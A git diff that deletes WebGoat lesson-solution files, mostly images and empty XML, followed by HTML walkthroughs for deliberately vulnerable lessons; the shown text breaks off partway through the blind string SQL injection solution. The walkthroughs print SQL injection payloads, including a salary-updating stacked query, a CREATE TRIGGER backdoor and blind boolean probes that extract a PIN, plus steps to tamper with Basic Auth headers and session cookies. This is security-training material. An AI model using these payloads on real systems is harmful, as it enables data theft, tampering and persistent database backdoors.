Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg
deleted file mode 100644
index 1cbf8ff3a..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg
deleted file mode 100644
index d9b59af8b..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg
deleted file mode 100644
index 5d30443e1..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg
deleted file mode 100644
index dec137dce..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx b/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg
deleted file mode 100644
index 7309a0035..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg
deleted file mode 100644
index 3b442cc42..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg
deleted file mode 100644
index 21ce9ef3d..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg
deleted file mode 100644
index 52b78aaca..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg
deleted file mode 100644
index bbc01ffc1..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg b/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg
deleted file mode 100644
index 27ca4296d..000000000
Binary files a/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/WsSAXInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/WsSAXInjection_files/filelist.xml
deleted file mode 100644
index 56559fd6d..000000000
--- a/src/main/webapp/lesson_solutions/WsSAXInjection_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png
deleted file mode 100644
index ba76d14d9..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg
deleted file mode 100644
index 24692deda..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png
deleted file mode 100644
index be045e27f..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg
deleted file mode 100644
index c6698ffba..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png
deleted file mode 100644
index 84e5ff852..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg
deleted file mode 100644
index 40dcd7832..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png
deleted file mode 100644
index 94b298db1..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg
deleted file mode 100644
index 9faeaaac1..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png
deleted file mode 100644
index acdfd2592..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg b/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg
deleted file mode 100644
index ad7400d38..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSAXInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/WsSqlInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/WsSqlInjection_files/filelist.xml
deleted file mode 100644
index 2596e1075..000000000
--- a/src/main/webapp/lesson_solutions/WsSqlInjection_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png
deleted file mode 100644
index 82abbd808..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg
deleted file mode 100644
index 60c86b971..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png
deleted file mode 100644
index e658bb1b9..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg
deleted file mode 100644
index cb476bc0d..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png
deleted file mode 100644
index d1db6bcb8..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg
deleted file mode 100644
index f3e91d5e9..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png
deleted file mode 100644
index d3bd79b6b..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg
deleted file mode 100644
index 50c57e172..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/WsSqlInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/XMLInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/XMLInjection_files/filelist.xml
deleted file mode 100644
index 91acaa646..000000000
--- a/src/main/webapp/lesson_solutions/XMLInjection_files/filelist.xml
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png
deleted file mode 100644
index b32e9194e..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png
deleted file mode 100644
index f0de7feb1..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png
deleted file mode 100644
index d2589d1b8..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png
deleted file mode 100644
index d2489a851..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png
deleted file mode 100644
index c2b095cd1..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png
deleted file mode 100644
index e316c46cb..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png
deleted file mode 100644
index 2c485734d..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png b/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png
deleted file mode 100644
index f59f4c79b..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg
deleted file mode 100644
index 5cde78c29..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg
deleted file mode 100644
index 50a020099..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg
deleted file mode 100644
index 3ec8d20a1..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg
deleted file mode 100644
index 3181beb41..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg
deleted file mode 100644
index 164e97f7d..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg
deleted file mode 100644
index 155301a55..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image022.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg
deleted file mode 100644
index 3ed684669..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image023.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg b/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg
deleted file mode 100644
index 00a8ad33b..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/image024.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/XMLInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/XPATHInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/XPATHInjection_files/filelist.xml
deleted file mode 100644
index 3d5d19db6..000000000
--- a/src/main/webapp/lesson_solutions/XPATHInjection_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png b/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png
deleted file mode 100644
index c710b2228..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png b/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png
deleted file mode 100644
index aa3b3886c..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png b/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png
deleted file mode 100644
index c63e9830a..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg b/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg
deleted file mode 100644
index a74456833..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image007.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg
deleted file mode 100644
index 229e969db..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg b/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg
deleted file mode 100644
index 731010dab..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/AccessControlMatrix.html b/src/main/webapp/lesson_solutions_1/AccessControlMatrix.html
deleted file mode 100644
index ab0e18e3c..000000000
--- a/src/main/webapp/lesson_solutions_1/AccessControlMatrix.html
+++ /dev/null
@@ -1,707 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: Using an
-Access Control Matrix
-
-
-
-
Concept /
-Topic To Teach:
-
-
-
-
In a
-role-based access control scheme, a role represents a set of access permissions
-and privileges. A user can be assigned one or more roles. A role-based access
-control scheme normally consists of two parts: role permission management and
-role assignment. A broken role-based access control scheme might allow a user
-to perform accesses that are not allowed by his/her assigned roles, or somehow
-allow privilege escalation to an unauthorized role.
-
-
-
-
General
-Goal(s):
-
-
Each user is
-a member of a role that is allowed to access only certain resources. Your goal
-is to explore the access control rules that govern this site. Only the [Admin]
-group should have access to the 'Account Manager' resource.
-
-
-
-
Solution :
-
-
-
-
This exercise
-is straightforward. You need to find a user where you can access a resource
-that you shouldn't be able to access.
-
-
After a few attempts
-you will learn that Larry can access resources of the role Account Manager.
-
-
-
-
-
-
Figure 1 Lesson 9
-
-
-
-
-
-
Figure 2 Lesson 9 Completed
-
-
-
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/BackDoors.html b/src/main/webapp/lesson_solutions_1/BackDoors.html
deleted file mode 100644
index 3a999c080..000000000
--- a/src/main/webapp/lesson_solutions_1/BackDoors.html
+++ /dev/null
@@ -1,841 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Create Database Back Door Attacks.
-
-
-
-
Concept /
-Topic To Teach:
-
-
How to Create
-Database Back Door Attacks.
-
-
-
-
How the
-attacks works:
-
-
Databases are
-used usually as a backend for web applications. Also it is used as a media of
-storage. It can also be used as a place to store a malicious activity such as a
-trigger. A trigger is called by the database management system upon the
-execution of another database operation like insert, select, update or delete.
-An attacker for example can create a trigger that would set his email address
-instead of every new user's email address.
-
-
-
-
General
-Goal(s):
-
-
Your
-goal should be to learn how you can exploit a vulnerable query to create a
-trigger.
-You will not be able to actually create one in this lesson because the
-underlying database engine used with WebGoat doesn't support triggers.
-Your login ID is 101.
-
-
-
-
-
-
Figure 1 Database backdoor
-
-
-
-
Solution:
-
-
Enter your user ID 101 to see how the application works.
-
-
-
-
-
-
Figure 2 User ID is 101
-
-
-
-
As you
-probably noticed, the input is not validated so very easy to do SQL Injection.
-To have two SQL queries executed, you need to separate them using a sem-colon.
-For example select * from employees; drop table employees will first select all
-the users from employees and then drop the table employees. Not all databases
-support multiple SQL statements.
-
-
-
-
Here you need
-to update the salary of the employees. This requires an update query like
-update employees set salary=10000.
-
-
-
-
Inject this
-for the user ID: 101; update employee set salary=10000
-
-
-
-
-
-
Figure 3 Update query
-
-
-
-
-
-
Figure 4 Stage 1 completed
-
-
-
-
To create a
-database trigger, you need to inject the following SQL: CREATE TRIGGER
-myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET
-email='john@hackme.com'WHERE userid = NEW.userid
-
-
-
-
-
-
Figure 5 Insert trigger
-
-
-
-
-
-
Figure 6 Lesson completed
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/BasicAuthentication.html b/src/main/webapp/lesson_solutions_1/BasicAuthentication.html
deleted file mode 100644
index 5d888cf5f..000000000
--- a/src/main/webapp/lesson_solutions_1/BasicAuthentication.html
+++ /dev/null
@@ -1,933 +0,0 @@
-
-
-
-
-
-
-
-Basic Authentication
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: Basic
-Authentication
-
-
-
-
Concept /
-Topic To Teach:
-
-
Basic
-Authentication is used to protect server side resources. The web server will send
-a 401 authentication request with the response for the requested resource. The
-client side browser will then prompt the user for a user name and password
-using a browser supplied dialog box. The browser will base64 encode the user
-name and password and send those credentials back to the web server. The web
-server will then validate the credentials and return the requested resource if
-the credentials are correct.
-
-
These
-credentials are automatically resent for each page protected with this
-mechanism without requiring the user to enter their credentials again.
-
-
-
-
General
-Goal(s):
-
-
For this
-lesson, your goal is to understand Basic Authentication and answer the
-questions below.
-
-
-
-
-
-
Figure 1 Lesson 13
-
-
-
-
To learn the
-name of the authentication header you must click “Submit” and intercept the
-request with WebScarab.
-
-
-
-
-
-
Figure 2 Intercepted request
-
-
-
-
The HTTP
-header that contains the Basic Authentication information is called
-"Authorization". This value Z3Vlc3Q6Z3Vlc3Q= is Base64 encoded. You can decode
-this by using WebScarab > Tools > Transcoder.
-
-
-
-
-
-
Figure 3 WebScarabs Transcoder
-
-
-
-
Click Base64
-decode.
-
-
-
-
-
-
Figure 4 Decode value
-
-
-
-
These values must
-be used to complete the questions.
-
-
-
-
-
-
Figure 5 Answers
-
-
-
-
-
-
-
-
Figure 6 Part 1 completed
-
-
-
-
For this
-lesson it is very important that you understand how the JSESSIONID cookie is
-used for session management and how the basic authorization header is used for
-authentication.
-
-
-
-
-
-
When WebGoat
-is able to retrieve a valid session you are automatically redirected to the
-lesson you are working on. When there is no valid session, WebGoat will create
-a new JSESSIONID and you will see the first lesson, HTTP Basics.
-
-
-
-
When there is
-no session cookie, WebGoat will first verify if you already authenticated. If
-not, you will get a pop-up window from the browser that requests your user name
-and password (guest/guest). After the user credentials are validated, you will
-access the Start-page of WebGoat and WebGoat will create a new JSESSIONID for
-this session.
-
-
-
-
To access
-WebGoat as the user basic, you need to corrupt the existing JSESSIONID and the
-Authorization header. You can do this in WebScarab. Intercept the request and
-delete a character from the JSESSIONID value and the Authorization header.
-
-
WebGoat will
-require you to authenticate, so you now enter for the user name basic and for
-the password basic. This logs you on as the user basic.
-
-
-
-
Remember our
-JSESSIONID? This JSESSIONID is a non-persistent cookie which is set during our
-first visit. Every request from the browser to WebGoat will have this cookie
-value. Corrupting this value in the previous request will not change the cookie
-value stored in browser memory and that is the reason why the old JSESSIONID
-cookie is sent in every request.
-
-
-
-
-
-
Figure 7 Basic Authentication
-
-
-
-
You clearly
-see that the JSESSIONID is the same like in the previous request, but the
-Authorization header now contains the Base 64 encoded value of basic:basic (you
-can decode this value in WebScarab > Tools > Transcoder).
-
-
-
-
Figure 8 Logged on as user basic
-
-
-
-
-
-
Because of the
-valid JSESSIONID, WebGoat retrieves the authenticated user via the server-side
-session object using getSession().getUser(). To make WebGoat believe that you
-are authenticated as basic, you need to corrupt the JSESSIONID, as shown in the
-screenshot below.
-
-
-
-
-
-
Figure 9 Corrupt JSESSIONID
-
-
-
-
-
-
-
-
Figure 10 Start page for user basic
-
-
-
-
Now you are
-redirected to the WebGoat start page. The JSESSIONID is changed and you lost all
-your green stars because the basic user hasn’t completed any lesson. Go to the
-lesson "Basic Authentication" to complete this lesson.
-
-
-
-
-
-
Figure 11 Lesson 13 Completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/BlindNumericSqlInjection.html b/src/main/webapp/lesson_solutions_1/BlindNumericSqlInjection.html
deleted file mode 100644
index 45eb33e58..000000000
--- a/src/main/webapp/lesson_solutions_1/BlindNumericSqlInjection.html
+++ /dev/null
@@ -1,46 +0,0 @@
-
-
-
-
-Solution: Blind Numeric SQL Injection
-
-
-
-Lesson Plan Title: Blind Numeric SQL Injection
-
-Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-
-
-General Goal(s):
-The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.
-
-The goal is to find the value of the field pin in table pins for the row with the cc_number of 1111222233334444. The field is of type int, which is an integer.
-
-Put the discovered pin value in the form to pass the lesson.
-
-
-Solution:
-In this lesson, the only output returned by the webpage is whether a given account exists or not. Therefore, we cannot simply request the pin number for this account.
-We can take advantage of the query being used, however. The database query being used is:
-SELECT * FROM user_data WHERE userid=accountNumber ;
-If this query returns information for the account, the page will indicate the account exists. However, if the userid doesnt exist, no data is returned and the page says the account is invalid.
-By using the AND function, we can add additional conditions to this query. If the additional condition is true, the result will be a valid account, if not the page will indicate the account is invalid.
-For example, try entering these two commands for the account ID:
-101 AND 1=1 and 101 AND 1=2
-In the first statement, both conditions return true. Account 101 is found and 1=1, so the page indicates the account is valid.
-In the second statement, only the first condition is true. Account 101 is found but 1 does not equal 2, so the page indicates the account is invalid.
-Now, we can use a more complicated command for our second true/false statement. The following statement will tell us if the pin is above or below 10000:
-101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );
-If our command returns false, it makes the entire statement false and returns and invalid account, which indicates the pin number is below 10000. If it is above 10000, the opposite is true.
-The last step is to repeatedly use this command with a different number to the right of the > operator until we can determine the pin number.
-The pin number is 2364 . Enter this number to complete the lesson.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/BlindStringSqlInjection.html b/src/main/webapp/lesson_solutions_1/BlindStringSqlInjection.html
deleted file mode 100644
index 844892b9d..000000000
--- a/src/main/webapp/lesson_solutions_1/BlindStringSqlInjection.html
+++ /dev/null
@@ -1,42 +0,0 @@
-
-
-
-
-Solution: Blind String SQL Injection
-
-
-
-Lesson Plan Title: Blind String SQL Injection
-
-Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-
-
-General Goal(s):
-The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.
-
-The goal is to find the value of the field name in table pins for the row with the cc_number of 4321432143214321. The field is of type varchar, which is a string.
-
-Put the discovered name in the form to pass the lesson. Only the discovered name should be put into the form field, paying close attention to the spelling and capitalization.
-
-
-Solution:
-This lesson is conceptually very similar to the previous lesson. The big difference is we are searching for a string, not a number.
-We will attempt to figure out the name the same way, by injecting a boolean expression into the pre-scripted SQL query. It looks similar to the one from the previous lesson:
-101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' );
-We can compare characters the same way we can compare numbers. For example, N > M. However, without the SUBSTRING method, we are attempting to compare the entire string to one letter, which doesn't help us. The substring method has the following syntax:
-SUBSTRING(STRING,START,LENGTH)
